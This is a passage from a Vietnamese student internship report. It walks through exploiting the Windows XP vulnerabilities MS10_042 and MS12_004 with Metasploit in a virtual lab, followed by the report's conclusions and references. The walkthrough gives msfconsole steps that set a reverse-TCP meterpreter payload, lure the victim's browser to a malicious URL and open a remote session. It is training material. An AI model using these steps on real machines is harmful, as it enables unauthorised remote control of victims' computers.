Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole


http://www.youtube.com/watch?v=nCUZ-9DxMKc


Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms10_042

Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.

Dùng lệnh show options để biết thêm các câu lệnh cần thiết.



Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>

Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp



Dùng lệnh set LHOST <ip backtrack>

Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.147.130:80/ nếu máy nạn nhân vào đường dẫn này sẽ bị hack.

Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.147.131.

Trên máy XP ta vào trình duyệt web và gõ đường dẫn http://192.168.147.130:80/

Trên máy XP tự động xuất hiện hộp thoại Help and Support.


http://192.168.147.130:80/

http://192.168.147.130:80/


Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ



Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.

Trên máy back track ta gõ lệnh sessions để kiểm tra.

Dùng lệnh sessions –i 1

Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác thành công lỗ hổng MS10_042 trên máy XP.



II. Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân)

Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.147.130

Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole

Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004



Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.

Dùng lệnh show options để biết thêm các câu lệnh cần thiết.

Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>



Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp

Dùng lệnh set LHOST <192.168.147.130>

Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn nếu máy nạn nhân vào đường dẫn này sẽ bị hack.



Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.147.131.

Trên máy XP ta vào trình duyệt web và gõ đường dẫn

Trên máy XP tự động xuất hiện hộp thoại yêu cầu chạy Windows Media Player. Nếu chọn Run sẽ bị hack.



Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ

Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó

Dùng lệnh sessions –i 1

Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác thành công lỗ hổng MS12_004 trên máy XP.



CHƯƠNG 18: KẾT LUẬN

I.Các kết quả đạt được.Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã có kiến thức về:

- Nguyên lý cơ bản của hệ điều hành mạng, kiến thức về hệ thống mạng, có kỹ năng cần thiết để cài đặt, cấu hình hoàn chỉnh mạng doanh nghiệp cỡ vừa và lớn dựa vào Windows Server 2008.

- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạng, nhiệm vụ quản lý bao gồm việc điều hành và hỗ trợ hệ thống.

- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.

II. Kinh nghiệm thực tế Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một doanh

nghiệp thông qua nền tảng.

Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ biết đến

thông qua sách vở.

Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.

Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên lớp.

Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.

Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.



III. Hoàn thiện bản thân Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ làm.

Tự tin hơn trong việc giao tiếp với mọi người trong công việc.

Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải quyết vấn

đề khó khăn gặp phải trong công việc.

IV. Các kiến thức được lĩnh hội Kiến thức thực tế về hệ thống mạng của doanh nghiệp.

Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.

V. Kết luận.Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều thiếu sót, đa

phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá và đưa ra những ý kiến

đóng góp để khắc phục và sữa chữa. Bênh cạnh trình độ chuyên mông cũng cần có những

kỹ năng mềm như kỹ năng giao tiếp, làm việc nhóm cũng hết sức quan trọng. Thực tập là

giai đoạn quan trọng của sinh viên, giúp sinh viên có cơ hội làm việc thực tế nhằm củng

cố kĩ năng, chuẩn bị cho giai đoạn làm việc thật sau khi tốt nghiệp. Trong quá trình thực

tập tại Trung tâm ATHENA, nhóm chúng em được tiếp xúc với một môi trường làm việc

chuyên nghiệp, các công nghệ, thiết bị,các mô hình thực tế... Qua đó nhóm học hỏi được

những kinh nghiệm nhất định và có những suy nghĩ đóng góp sau:

Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một công ty, cần

có nhiều bộ phận phối hợp với nhau để thực hiện và hoàn thành dự án.

Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân viên cần có

những kỹ năng cơ bản để làm việc trong đội, nhóm:

o Làm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả trong đội ngũ. Đó

là việc có thể sử dụng đúng người để có được kết quả tốt nhất và luôn sẵn sàng để có thể

lãnh đạo hoặc phối hợp làm theo.

o Tìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết được nơi để có được

thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó. Điều này có thể liên quan đến

việc sử dụng các nguồn lực khác nhau, cho dù chúng là từ những con người hoặc từ các

tài liệu trong thế giới rộng lớn của công nghệ



o Kỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng thích nghi để giải

quyết công việc chúng ta gặp phải hàng ngày trong công việc lẫn đời sống riêng. Giải

quyết vấn đề là xác định vấn đề, nghiên cứu giải pháp và đưa ra những quyết định hiệu

quả.

Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công nghệ thông

tin ,ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt

VI. Tài liệu tham khảo.[1] www.youtube.com/channel/trojan-backdoor-athena

[2] http://www.youtube.com/Thang VoDo

[3] Barrie Dempster - Kerry Garrison, TrixBox Made Easy, Packt Publishing, 2006.

[4] Theodore Wallingford, VoIP Hacks, O'Reilly Media, 2006

[5] Paul Mahle, VoIP telephony with Asterisk, Mahler, 2004

[6] http:///www.voip-info.org

[7] http://google.com

[8] http://www.quantrimang.com

[9] http://thuvien-it.net


http://www.quantrimang.com/

http://google.com/

http://www.youtube.com/Thang

Nguyenthithuhien_baocaothuctap

Documents

Transcript of Nguyenthithuhien_baocaothuctap